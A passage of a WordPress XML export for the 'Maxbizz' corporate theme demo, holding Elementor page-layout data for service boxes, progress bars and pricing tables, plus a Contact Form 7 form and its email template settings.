wealth.","icon_size":{"unit":"px","size":42,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9736423","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"740d57b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"42a0f44","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1ed1cd4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"af68c9c","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#55BB531C","bg_hover_icon_bg":"#FFFFFF1A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"9f24e04","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"db8197f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#55BB531C","bg_hover_icon_bg":"#FFFFFF1A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"6d55426","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"6c42f1a","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg":"#55BB531C","bg_hover_icon_bg":"#FFFFFF1A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"ccfedc3","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"cd58237","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5bc1f0b","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#55BB531C"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"b140664","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ab511b8","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve beven a strategy thought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#55BB531C"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"29f766a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ad7d79d","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy tmhought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#55BB531C"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"3bd1a3a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"5ff8069","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":36,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"icon_bg":"#55BB531C"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"0422c24","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4893536","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"6a60a09","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Audit and Assurance","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_size":{"unit":"px","size":43,"sizes":[]},"icon_color":"#FFFFFF","icon_bg":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9089712","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"ea9b75f","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Gross Tax Planning","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"4c25bc2","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"596b78b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"698ffdc","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"eb94e32","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"be4a619","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"\u041erganizational Audit","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"bbe4b35","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8c33540","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"82fa562","elType":"widget","settings":{"title":"Progress Bars","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"37788eb","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5249351","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a17e202","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"7213754","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"173ab3c","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e4501d0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"content_position":"center","align":"space-evenly","_ot_content_align":"horizontal"},"elements":[{"id":"6e13157","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"712f4c6","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a0928a2","elType":"widget","settings":{"title":"Pricing Tables","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4b24f46","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3254d38","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"01efe9e","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"16a9414","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"15b3e04","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"26f11eb","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"25be18a","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"d184df3","elType":"widget","settings":{"title":"Flip Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0457628","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"08202ed","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a0f08f5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"0ed39b4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a2601a1","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"ec866a8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"77a09fc","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true},{"id":"23a755c","elType":"widget","settings":{"title":"Service Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"611b0b8","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"38c3fac","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"b22c2fd","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9039823","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f7959fa","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"87c6b1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"417a646","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","box_bg":"#FFFFFF","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[publish]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_time]]></wp:meta_key>
		<wp:meta_value><![CDATA[1609409823]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_desired_post_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[elements]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?post_type=wpcf7_contact_form&#038;p=736</link>
		<pubDate>Thu, 10 Sep 2020 08:20:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=736</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>736</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:20:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:20:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
